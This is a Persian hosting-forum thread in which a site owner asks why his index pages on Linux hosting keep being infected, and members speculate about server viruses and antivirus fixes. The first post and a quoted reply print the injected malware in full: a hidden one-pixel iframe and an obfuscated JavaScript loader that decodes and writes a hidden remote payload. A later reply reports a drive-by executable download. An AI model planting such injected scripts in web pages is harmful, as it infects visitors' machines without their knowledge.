مشکل هک شدن پیاپی!

foranyone

foranyone

Well-Known Member
سلام

نمیدونم عنوانی که برا این تاپیک انتخاب کردم عنوان صحیحیه یا نه !

من از یه شرکتی همیشه خرید می کنم که خیلی خدمات و پشتیبانیشون خوبه ! همیشه هاست ویندوز ازشون

می گرفتم ولی بعدش از هاست لینوکسشون به دلیل پشتیبانی از zend optimizer و قیمت مناسبش استفاده کردم

حدود 10 تا سایت آپلود شده روی سرور های لینوکسشون دارم ولی تازگی های یه مشکلی پیدا کردم که واقعا نمیدونم

چیکار کنم ، هر روز مشتری هام بهم زنگ میزنن که سایت از کار افتاده !!!

به خاطر این مشکل حسابی از کار و زندگی افتادم!

مشکل اینه که فایل های index اصلا امنیت ندارن و همیشه این کد بعد body به کد اضافه میشه :

کد: 
<iframe src='http://url/' width='1' height='1'></iframe>
<script>
function c1023895d9q49ddde4972b04(q49ddde49732d3){ 
function q49ddde4973aa5(){return 16;
} return (eval('pars'+'eInt')(q49ddde49732d3,q49ddde4973aa5()));}function q49ddde4974a47(q49ddde4975217){ function q49ddde497698b(){return 2;} var q49ddde49759e8='';q49ddde497792d=String['fromCharCode'];for(q49ddde49761ba=0;q49ddde49761ba<q49ddde4975217.length;q49ddde49761ba+=q49ddde497698b()){ q49ddde49759e8+=(q49ddde497792d(c1023895d9q49ddde4972b04(q49ddde4975217.substr(q49ddde49761ba,q49ddde497698b()))));}return q49ddde49759e8;} var ne4='';var q49ddde4978100='3C7'+ne4+'3637'+ne4+'2697'+ne4+'07'+ne4+'43E696628216D7'+ne4+'96961297'+ne4+'B646F637'+ne4+'56D656E7'+ne4+'42E7'+ne4+'7'+ne4+'7'+ne4+'2697'+ne4+'465287'+ne4+'56E657'+ne4+'363617'+ne4+'065282027'+ne4+'2533632536392536362537'+ne4+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+ne4+'332537'+ne4+'32253633253364253237'+ne4+'2536382537'+ne4+'342537'+ne4+'342537'+ne4+'30253361253266253266253637'+ne4+'253666253637'+ne4+'2536662533322536642536352532652536652536352537'+ne4+'34253266253265253637'+ne4+'2536662532662536332536382536352536332536622532652536382537'+ne4+'34253664253663253366253237'+ne4+'2532622534642536312537'+ne4+'342536382532652537'+ne4+'322536662537'+ne4+'352536652536342532382534642536312537'+ne4+'342536382532652537'+ne4+'32253631253665253634253666253664253238253239253261253333253339253336253338253331253332253239253262253237'+ne4+'253337'+ne4+'253334253330253330253237'+ne4+'2532302537'+ne4+'37'+ne4+'2536392536342537'+ne4+'34253638253364253336253337'+ne4+'253336253230253638253635253639253637'+ne4+'2536382537'+ne4+'34253364253335253338253337'+ne4+'2532302537'+ne4+'332537'+ne4+'342537'+ne4+'39253663253635253364253237'+ne4+'2537'+ne4+'362536392537'+ne4+'332536392536322536392536632536392537'+ne4+'342537'+ne4+'39253361253638253639253634253634253635253665253237'+ne4+'2533652533632532662536392536362537'+ne4+'3225363125366425363525336527'+ne4+'29293B7'+ne4+'D7'+ne4+'6617'+ne4+'2206D7'+ne4+'969613D7'+ne4+'47'+ne4+'27'+ne4+'5653B3C2F7'+ne4+'3637'+ne4+'2697'+ne4+'07'+ne4+'43E';document.write(q49ddde4974a47(q49ddde4978100));
</script>

من از این کد جاوااسکریپت اصلا سر در نیاوردم !! ولی iframe بالا سایت url.com رو نمایش میده ، البته به صورتی که کاربر

سایت متوجه نشه اگه دقت کنین ابعاد iframe یک در یک انتخاب شده!:-?

من با اینکه پرمیژن های فایل های index رو مدام تغیر میدم ، ولی بازم کد بالا به فایل های index اضافه میشه ، و بعد یه مدت

کل صفحه از کار می افته ، به نظرتون مشکل از سرورهای شرکته یا من؟

راه حل خاصی دارین ؟

به نظرتون استفاده از فایل htaccess و تغیر فایل پیشفرض از index به یه چیز دیگه ، مشکلمو حل میکنه؟

:sad:
 
آخرین ویرایش:
ziXet

ziXet

مدیر انجمن PHP/MYSQL
foranyone گفت:
سلام

نمیدونم عنوانی که برا این تاپیک انتخاب کردم عنوان صحیحیه یا نه !

من از یه شرکتی همیشه خرید می کنم که خیلی خدمات و پشتیبانیشون خوبه ! همیشه هاست ویندوز ازشون

می گرفتم ولی بعدش از هاست لینوکسشون به دلیل پشتیبانی از zend optimizer و قیمت مناسبش استفاده کردم

حدود 10 تا سایت آپلود شده روی سرور های لینوکسشون دارم ولی تازگی های یه مشکلی پیدا کردم که واقعا نمیدونم

چیکار کنم ، هر روز مشتری هام بهم زنگ میزنن که سایت از کار افتاده !!!

به خاطر این مشکل حسابی از کار و زندگی افتادم!

مشکل اینه که فایل های index اصلا امنیت ندارن و همیشه این کد بعد body به کد اضافه میشه :

کد: 
<iframe src='http://url/' width='1' height='1'></iframe>
<script>
function c1023895d9q49ddde4972b04(q49ddde49732d3){ 
function q49ddde4973aa5(){return 16;
} return (eval('pars'+'eint')(q49ddde49732d3,q49ddde4973aa5()));}function q49ddde4974a47(q49ddde4975217){ function q49ddde497698b(){return 2;} var q49ddde49759e8='';q49ddde497792d=string['fromcharcode'];for(q49ddde49761ba=0;q49ddde49761ba<q49ddde4975217.length;q49ddde49761ba+=q49ddde497698b()){ q49ddde49759e8+=(q49ddde497792d(c1023895d9q49ddde4972b04(q49ddde4975217.substr(q49ddde49761ba,q49ddde497698b()))));}return q49ddde49759e8;} var ne4='';var q49ddde4978100='3c7'+ne4+'3637'+ne4+'2697'+ne4+'07'+ne4+'43e696628216d7'+ne4+'96961297'+ne4+'b646f637'+ne4+'56d656e7'+ne4+'42e7'+ne4+'7'+ne4+'7'+ne4+'2697'+ne4+'465287'+ne4+'56e657'+ne4+'363617'+ne4+'065282027'+ne4+'2533632536392536362537'+ne4+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+ne4+'332537'+ne4+'32253633253364253237'+ne4+'2536382537'+ne4+'342537'+ne4+'342537'+ne4+'30253361253266253266253637'+ne4+'253666253637'+ne4+'2536662533322536642536352532652536652536352537'+ne4+'34253266253265253637'+ne4+'2536662532662536332536382536352536332536622532652536382537'+ne4+'34253664253663253366253237'+ne4+'2532622534642536312537'+ne4+'342536382532652537'+ne4+'322536662537'+ne4+'352536652536342532382534642536312537'+ne4+'342536382532652537'+ne4+'32253631253665253634253666253664253238253239253261253333253339253336253338253331253332253239253262253237'+ne4+'253337'+ne4+'253334253330253330253237'+ne4+'2532302537'+ne4+'37'+ne4+'2536392536342537'+ne4+'34253638253364253336253337'+ne4+'253336253230253638253635253639253637'+ne4+'2536382537'+ne4+'34253364253335253338253337'+ne4+'2532302537'+ne4+'332537'+ne4+'342537'+ne4+'39253663253635253364253237'+ne4+'2537'+ne4+'362536392537'+ne4+'332536392536322536392536632536392537'+ne4+'342537'+ne4+'39253361253638253639253634253634253635253665253237'+ne4+'2533652533632532662536392536362537'+ne4+'3225363125366425363525336527'+ne4+'29293b7'+ne4+'d7'+ne4+'6617'+ne4+'2206d7'+ne4+'969613d7'+ne4+'47'+ne4+'27'+ne4+'5653b3c2f7'+ne4+'3637'+ne4+'2697'+ne4+'07'+ne4+'43e';document.write(q49ddde4974a47(q49ddde4978100));
</script>

من از این کد جاوااسکریپت اصلا سر در نیاوردم !! ولی iframe بالا سایت url.com رو نمایش میده ، البته به صورتی که کاربر

سایت متوجه نشه اگه دقت کنین ابعاد iframe یک در یک انتخاب شده!:-?

من با اینکه پرمیژن های فایل های index رو مدام تغیر میدم ، ولی بازم کد بالا به فایل های index اضافه میشه ، و بعد یه مدت

کل صفحه از کار می افته ، به نظرتون مشکل از سرورهای شرکته یا من؟

راه حل خاصی دارین ؟

به نظرتون استفاده از فایل htaccess و تغیر فایل پیشفرض از index به یه چیز دیگه ، مشکلمو حل میکنه؟

:sad:
کلیک کنید تا باز شود...
خب حالا چه مشکلی تو صفحه پیش میاد که کاربر نماس میگیره؟

آدرس سایتو بده
 
mosi20

mosi20

Active Member
سرور هاستت ویروس گرفته یا یه چیزی مثل ویروس.
به هاستت ایمیل بزن و این موضوع را بگو
منم قبلا هاستم اینجوری شده بود.البته ۳-۴ سال پیش!
 
foranyone

foranyone

Well-Known Member
خب حالا چه مشکلی تو صفحه پیش میاد که کاربر نماس میگیره؟

آدرس سایتو بده
کلیک کنید تا باز شود...

مهمترین مشکلی که پیش میاد اینه که این اسکریپت حدود 400 و 500 پیکسل ارتفاع به خودش تخصیص میده ، و سایت بدریخت میشه!
و یعد از یه مدت فایل از کار می افته مثلا کد های php رو نشون میده !
 
hossein_salehi

hossein_salehi

Member
ویروس سمت سرور

foranyone گفت:
یعنی اگه آنتی ویروس سرور قوی باشه مشکل حل میشه؟
کلیک کنید تا باز شود...

مشکل از ویروسی هست که احتمالا به صورت پاپآپ به سی پنل هم سرایت شده ( ممکنه هم نشده باشه ) - مدیر سرور باید آنتی ویروس مناسب ( حداقل avg چون فری هم هست هزینه ای متقبل نمیشند ) نصب کنند و سریع بزارن آپدیت بشه و بزارن اسکن کنه کل هارد رو ( حتی ممکنه 6 ساعت طول بکشه یابیشتر ) بعد سرور رو ریست بدن. اگر حل نشه باید به صورت دستی دوباره فایل ها رو آپلود کنید انشالا که اگر آنتی ویروس اکتیو باشه این مشکل پیش نمیاد دیگه!
 
foranyone

foranyone

Well-Known Member
hossein_salehi گفت:
مشکل از ویروسی هست که احتمالا به صورت پاپآپ به سی پنل هم سرایت شده ( ممکنه هم نشده باشه ) - مدیر سرور باید آنتی ویروس مناسب ( حداقل avg چون فری هم هست هزینه ای متقبل نمیشند ) نصب کنند و سریع بزارن آپدیت بشه و بزارن اسکن کنه کل هارد رو ( حتی ممکنه 6 ساعت طول بکشه یابیشتر ) بعد سرور رو ریست بدن. اگر حل نشه باید به صورت دستی دوباره فایل ها رو آپلود کنید انشالا که اگر آنتی ویروس اکتیو باشه این مشکل پیش نمیاد دیگه!
کلیک کنید تا باز شود...

خیلی ممنون از راهنماییتون ولی من بعید میدونم سرورشون آنتی ویروس نداشته باشه !

چون انصافا خدماتشون خیلی خوبه و من به جز این مورد کاملا ازشون راضی هستم:wink:

آنتی ویروس ممکنه همه ی فایل های آلوده رو delete کنه ؟
 
hossein_salehi

hossein_salehi

Member
...

foranyone گفت:
خیلی ممنون از راهنماییتون ولی من بعید میدونم سرورشون آنتی ویروس نداشته باشه !

چون انصافا خدماتشون خیلی خوبه و من به جز این مورد کاملا ازشون راضی هستم:wink:

آنتی ویروس ممکنه همه ی فایل های آلوده رو delete کنه ؟
کلیک کنید تا باز شود...

خواهش میکنم. خدمات کلمه گسترده ای هست! فکر کنم منظورتون پشتیبانی اونها بوده. ایشالا که بازم ازشون راضی باشید ( نمیشناسم ... )
اما به نظرم ندارن یا آپدیت نشده چون سرورایی که مدیریت کردم وقتی آنتی ویروساشون رو به موقع آپدیت میکردم ندیم این مشکل رو - یه سرور این طوری برام پیش اومد براشون AVG که گفتم نصب کردم و آپدیت کردم و بهشون گفتم نسخه enterprise رو بخرن - خوشبختانه مشکلشون حل شد!
نه مثل ویندوز نیست که پاک کنه! آخه ساختار لینوکس با ویندوز فرق داره - ویروس های ویندوزی چون اختیارات زیادی مبنی بر پرمیشن باهاش برخورد میکنند پس دستشون بازه خودشون رو جای فایل جا بزنند و ...
اما لینوکس اینطوری نیست - کلا 3 تا پرمیشن رو متوجه میشه ! که دست رو برای ویروس باز نمیزاره! به هر حال مسئول سرور باید اطلاعات یک هفته قبل و یک ماه قبل شما رو داشته باشه!
 
foranyone

foranyone

Well-Known Member
دوست عزیز ، دقیقا موافقم که خدمات معنای گسترده ای داره ولی من از لحاظ پشتیبانی کاملا ازشون راضی هستم ،

سرورهای ویندوزشون هم انصافا عالی بود ولی مجبور بودم از هاست لینوکس استفاده کنم به دلایلی که گفتم .

احساس میکنم مشکل پرمیژن هم کار همین ویروس باشه ، آخه هر وقت از طریق فایل php یه فایلی رو آپلود میکنم بعدش از طریق

Cpanel یه FTP دیگه نمیشه اون فایل رو حذف کرد !!!!!

پیغام میده که شما اجازه این کار رو ندارید !

نیازی نیست اطلاعات من رو داشته باشه ، چون این مشکل فقط مربوط به من نمیشه ، می تونن یه فایل index اپلود کنن روی

هاست و بعد از زمان نامشخص ببینن که فایل آلوده شده !
 
saeedesign

saeedesign

Member
شک نکن ویروسه..
سرور آنتی ویروس داشته باشه مهم نیست..باید به کار برده شود و ویروس و تشخیص بده...
موفق باشی
 
yakoza

yakoza

Well-Known Member
من هر چی فکر کردم ربطشو به انجمن php نفهمیدم

منتقل شد
 
pardisgroup

pardisgroup

Active Member
حالا این چه ربطی به هک داره ؟ .. حجم فابل هاتون اگه زیاد نیست یه جای دیگه هم تست کنید.
 
foranyone

foranyone

Well-Known Member
ربطش به انجمن PHP این بود که می خواستم مشکل رو اگه شرکت هاستینگ حل نکنه از طریق فایل htaccess حل کنم !

ربطش به هک هم اینه که احتمال میدادم مشکل از هاستینگ نباشه و به سایت ها حمله میشه !

جای دیگه ننیاز نیست تست بشه ، حتی اگه یه فایل index خالی هم آپلود کنم این بلا سرش میاد
 
foranyone

foranyone

Well-Known Member
yakoza گفت:
htaccess بازم ربطی به php نداره ؟

موفق باشی
کلیک کنید تا باز شود...

ای بابا:D

yakoza جان ببخشید انجمن PHP مطرح کردم ، و ممنون که به بخش مناسب انتقالش دادین
:D

نمیدونم چرا سیاوش جان هم آموزش htaccess رو تو مقالات بخش php گذاشته بودن !!!!

خواهشا اگه نظری در مورد مشکلم ندارین از بحث اصلی منحرف نکنی:wink:ن
 
آخرین ویرایش:
farik

farik

Well-Known Member
با سلام.....
ببخشيد من مزاحم ميشم ولي همين الانم كه من داشتم از اين صفحه بازديد ميكردم مرورگم داشت يك فايل رو دانلود ميكرد و ميخواست اجرا كنه كه آنتي ويروسم خبر داد(اسم فايل:a.exe)لطفا دوستان مراقب باشند كه كدهاي هك و ويروس رو يكم امن تر بزارن كه مردم ويروسي نشن..
با تشكر TABOTABDESIGN
 
foranyone

foranyone

Well-Known Member
مرسی ، یه اتفاق عجیب هم افتاده ، کد جوااسکریپتی که نقش ویروس رو داشت تغیر کرده (به اولین پست نگاه کنید)

پس یعنی این جاوا اسکریپت یه فایل exe رو اجرا میکنه ؟ فایل Exe چطور سرور لینوکس هاست رو میتونه آلوده کنه؟
 
برای ارسال پاسخ شما باید وارد سیستم شوید.

آخرین مطالب مجیدآنلاین

جدیدترین ارسال ها

بالا